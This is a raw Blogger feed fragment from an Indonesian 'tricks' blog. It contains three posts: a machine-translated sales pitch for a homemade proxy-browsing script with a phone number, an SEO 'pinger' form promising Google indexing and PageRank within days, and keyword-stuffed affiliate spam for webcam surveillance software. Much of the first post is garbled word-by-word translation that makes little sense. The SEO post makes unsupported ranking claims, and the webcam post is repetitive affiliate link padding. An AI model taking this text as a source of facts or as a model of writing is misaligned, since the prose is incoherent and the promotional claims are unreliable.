style="font-family:arial;"&gt;can&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;you&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;develop&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;the&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;script&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;itself&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;is much&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;better&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;than&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;before&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"  style="font-family:arial;"&gt;,&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;yes&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;indeed&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;many&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;parts of&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;the&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;bug&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;is&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;still&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;not&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;covered&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"  style="font-family:arial;"&gt;,&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;but the&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;fruit&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;of you who&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;want to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;browse the&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;website&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;by&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span style="font-weight: bold;font-family:arial;" title="Klik untuk terjemahan alternatif" class="hps" &gt;proxy&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;is not&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;too&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;difficult,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;make&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;your&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;who&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;want to&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;improve&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;your site&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;or&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;blog&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;could&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;end&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;in&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;the&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;labuhi&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;with&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;tools&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;made your&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;own&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;right&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;rather&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;than&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;you&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;have to&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span style="font-weight: bold;font-family:arial;" title="Klik untuk terjemahan alternatif" class="hps" &gt;download&lt;/span&gt;&lt;span style="font-weight: bold;font-family:arial;" &gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;&lt;span style="font-weight: bold;"&gt;software &lt;/span&gt;that is&lt;/span&gt;&lt;span style="font-family:arial;"&gt;  &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;difficult&lt;/span&gt;&lt;span style="font-family:arial;"&gt;  &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;to&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;be developed&lt;/span&gt;&lt;span style="font-family:arial;"&gt;  &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;to be a  better&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;better&lt;/span&gt;&lt;span style="font-family:arial;"&gt;  &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;to use&lt;/span&gt;&lt;span style="font-family:arial;"&gt;  &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;a homemade&lt;/span&gt;&lt;span style="font-family:arial;"&gt;  &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;tool&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;fairly&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;cheap&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;not&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;too&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;expensive&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;just&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;shell out&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;just&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;once&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;doang&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;Alone&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;and&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;another&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;100,000&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;are&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;scrpit&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;if&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;made in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;the software&lt;/span&gt;&lt;span style="font-family:arial;"&gt;  &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;can be&lt;/span&gt;&lt;span style="font-family:arial;"&gt;  &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;sold&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;again&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;how many thousands&lt;/span&gt;&lt;span style="font-family:arial;"&gt;  &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;it&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;cost&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;you&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;even&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;able to&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;get&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;even bigger&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;money&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"  style="font-family:arial;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span id="result_box" class="" lang="en"&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;capital only&lt;/span&gt;&lt;span style="font-family:arial;"&gt;  &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;100,000&lt;/span&gt;&lt;span style="font-family:arial;"&gt;  &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;only&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"  style="font-family:arial;"&gt;.&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;tuh&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"  style="font-family:arial;"&gt;'s&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;okay&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;if you&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;could&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;script&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;the&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;call&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;to&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;this number&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;081945906827&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;accepted the&lt;/span&gt;&lt;span style="font-family:arial;"&gt;  &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;text&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;or&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;telephone, &lt;/span&gt;&lt;/span&gt;&lt;span id="result_box" class="short_text" lang="en"&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;west&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;of&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;the&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;target&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;number of&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;30&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;pots&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-874307356891986475?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/874307356891986475/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2011/01/di-jual-script-suft-proxy-vb.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/874307356891986475'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/874307356891986475'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/01/di-jual-script-suft-proxy-vb.html' title='di jual script suft proxy vb'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_nLUUYT3afN4/TTexYagWphI/AAAAAAAAAC8/qkufU0ACA4Y/s72-c/ebook%2BWSP.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-8106346621647031873</id><published>2011-01-09T22:54:00.000-08:00</published><updated>2011-01-11T00:31:23.176-08:00</updated><title type='text'>pingger submit SEO</title><content type='html'>solution for you who want to conduct a campaign  in a way  melode  ping, so you can easily enter jejajaran SEO google please have your content url below, in a day can already indexed by google .&lt;br /&gt;&lt;form action="" name="pingForm" id="pingForm" onsubmit="return  validate(this);"&gt;&lt;table style="margin-left: 5%; margin-top: 50px; width: 323px; height: 127px;"&gt;&lt;tbody&gt;&lt;tr valign="top"&gt;&lt;td nowrap="nowrap" width="136"&gt;&lt;label for="url"&gt;Address Blog Your :&lt;/label&gt;&lt;/td&gt;&lt;td width="250"&gt;&lt;div id="error"&gt;&lt;input name="url" id="url" maxlength="140"  style="font-size:40;"&gt;&lt;br /&gt;&lt;span style="font-size:-1;color:#676767;"&gt;Google SEO INDEX PINGGER, OKE&lt;br /&gt;&lt;br /&gt;googleblog.blogspot.com/atom.xml&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="padding-top: 3ex;"&gt;&lt;input value="Submit Blog" name="btnG" type="submit"&gt;&lt;input id="hl" name="hl" value="en" type="hidden"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/form&gt;SEO promotion ping mode was used on the website or program - a program large companies  in increasing sales of his product.&lt;br /&gt;&lt;br /&gt;use this technique 2 days then you will get the google pagerank of a stable despite a PR is still not easy to lose, I just wear it, because on my blog very much articlenya SEO google would give 0 0 again it does not mean you do not have google pagerank update status.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-8106346621647031873?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/8106346621647031873/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2011/01/pingger-submit-seo.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/8106346621647031873'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/8106346621647031873'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/01/pingger-submit-seo.html' title='pingger submit SEO'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-3147769054068911773</id><published>2011-01-09T03:18:00.001-08:00</published><updated>2011-01-09T03:18:42.997-08:00</updated><title type='text'>camera internet</title><content type='html'>&lt;h2&gt;Broadcasting live video and audio from capture device&lt;br /&gt;via web camera computer application&lt;/h2&gt;&lt;br /&gt;&lt;a href="http://www.BigExtraCash.com/aft/09fe7612/237dd6fb.html" title="Broadcasting live video and sound from capture card using web camera server software"&gt;&lt;br /&gt;&lt;img src="http://www.BigExtraCash.com/services/active_webcam_img.php?31" hspace="10" border="0" align="left"&lt;br /&gt;alt="Streaming live video and audio from capture card via web camera server software"&gt;&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.BigExtraCash.com/aft/09fe7612/237dd6fb.html" title="Streaming live video and audio from capture device using webcamera server application"&gt;&lt;br /&gt;Surveillance application&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;If you find yourself with a need to record security video with a webcamera over an area,&lt;br /&gt;&lt;a href="http://www.BigExtraCash.com/aft/09fe7612/237dd6fb.html" title="Streaming live video and sound from capture card through webcamera server application"&gt;&lt;br /&gt;webcam&lt;br /&gt;computer software&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;may be the right choice for you. Using this application, it is possible to set up a&lt;br /&gt;camera to detect movement and begin recording once it does.&lt;br&gt;&lt;br /&gt;Depending on your needs, the sights and sounds that are picked up by the webcam may be stored on a hard drive, or if the captured video&lt;br /&gt;needs to be accessible off-site, can be broadcast using the server's broadcasting&lt;br /&gt;feature to a web site.&lt;br&gt;&lt;br /&gt;Depending on the quality of the webcam and the viewer's video card, the picture that is recorded may be as clear as a high-definition television signal.&lt;br /&gt;Using a install like this, it is possible to provide a measure of security for an area while&lt;br /&gt;the economics of the situation do not justify hiring a security firm or setting up a professional monitoring system.&lt;br&gt;&lt;br /&gt;This&lt;br /&gt;&lt;a href="http://www.BigExtraCash.com/aft/09fe7612/237dd6fb.html" title="Streaming online video and audio from capture device using web camera computer software"&gt;&lt;br /&gt;do-it-yourself approach&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;can save money while not compromising on protection.&lt;br /&gt;&lt;/p&gt;&lt;h2&gt;I'm using webcam application. I&lt;br /&gt;can webcast Online video to view my home&lt;br /&gt;from everywhere.&lt;/h2&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;a href="http://www.BigExtraCash.com/aft/09fe7612/237dd6fb.html" title="Webcam software identifies activity, triggers siren, captures images, records video, and sends captured images by email"&gt;&lt;br /&gt;&lt;img src="http://www.BigExtraCash.com/services/active_webcam_img.php?25" hspace="10" border="0" align="left" alt="Webcam software detects motion, triggers siren, captures snapshots, records video, and sends captured images by email"&gt;&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;With my new&lt;br /&gt;&lt;a href="http://www.BigExtraCash.com/aft/09fe7612/237dd6fb.html" title="Webcam software detects motion, triggers alarm, captures snapshots, records video, and sends captured images by e-mail"&gt;&lt;br /&gt;camera application&lt;/a&gt;, I can run a streaming tv station&lt;br /&gt;of my site viewable from the Internet. This opens up a number&lt;br /&gt;of possibilities, the surface of which has not even been scratched in today's world. I can use&lt;br /&gt;this webcast for surveillance purposes, allowing me to see what's going on in my apartment&lt;br /&gt;at any time from a remote viewing pc.&lt;br&gt;&lt;br /&gt;As long as I have the webcam&lt;br /&gt;running and a remote computer with Online access, I can view the room.&lt;br /&gt;With the software and the webcam, I can change the settings to capture video,&lt;br /&gt;detect motion (if I don't want to keep the webcam running at all times),&lt;br /&gt;or use a mixture of a online feed and recorded video to implement a protection&lt;br /&gt;system that takes full benefit of novel know-how.&lt;br&gt;&lt;br /&gt;With a capture card,&lt;br /&gt;I can easily transmit relevant video and screenshots to use on&lt;br /&gt;any computer.&lt;br&gt;&lt;br /&gt;With delicate files on my computer&lt;br /&gt;and useful belongings in my apartment,&lt;br /&gt;it only makes sense to have a protection setup that I can monitor whenever I feel that my privacy&lt;br /&gt;is being compromised. If I owned a small company or lived with roommates, I couldn't imagine&lt;br /&gt;living without it.&lt;/p&gt;&lt;h2&gt;Modern professional surveillance application works with&lt;br /&gt;any web camera, Internet cameras, and major capture cards. &lt;/h2&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;a href="http://www.BigExtraCash.com/aft/09fe7612/237dd6fb.html" title="Web camera software detects activity, sounds siren, captures images, records video, and sends captured images by email"&gt;&lt;br /&gt;&lt;img src="http://www.BigExtraCash.com/services/active_webcam_img.php?32" hspace="10" border="0" align="left" alt="Webcam software senses activity, triggers alarm, captures snapshots, records video, and sends captured images by email"&gt;&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.BigExtraCash.com/aft/09fe7612/237dd6fb.html" title="Webcam software detects movement, sounds alarm, captures images, records video, and sends captured images by email"&gt;&lt;br /&gt;Security application&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;has become so sophisticated that the regular&lt;br /&gt;user who has been busy minding his store instead of pouring over electronics and internet&lt;br /&gt;technology articles can be easily overwhelmed when it comes time to install or modernize his security system.&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Luckily, there is new professional security application that simplifies much of the decision making.&lt;br /&gt;You don't necessarily have to get rid of a working analog CCTV system in order to renew to a broadcasting&lt;br /&gt;video that can be watched from any internet connected station or 3G phone. Video capture cards can digitally convert the&lt;br /&gt;images for broadcast. Until recently, there had been no real attempts to regulate the new IP&lt;br /&gt;cameras; every make and manufacturer functioned a tiny differently. And when you connect cameras into the&lt;br /&gt;mix, finding one software to control them all was heavy.&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;a href="http://www.BigExtraCash.com/aft/09fe7612/237dd6fb.html" title="Modern professional security application works with any web camera, Internet cameras, and major capture cards"&gt;&lt;br /&gt;Professional security software&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;is now accessible that will work for any webcamera&lt;br /&gt;or Internet webcam and for most capture cards as well. You can supervise whatever your movement&lt;br /&gt;sensors are picking up at your room or business while you can be half a globe away.&lt;br /&gt;The software itself may not be easy, but it can get life simpler for you. &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-3147769054068911773?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/3147769054068911773/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' 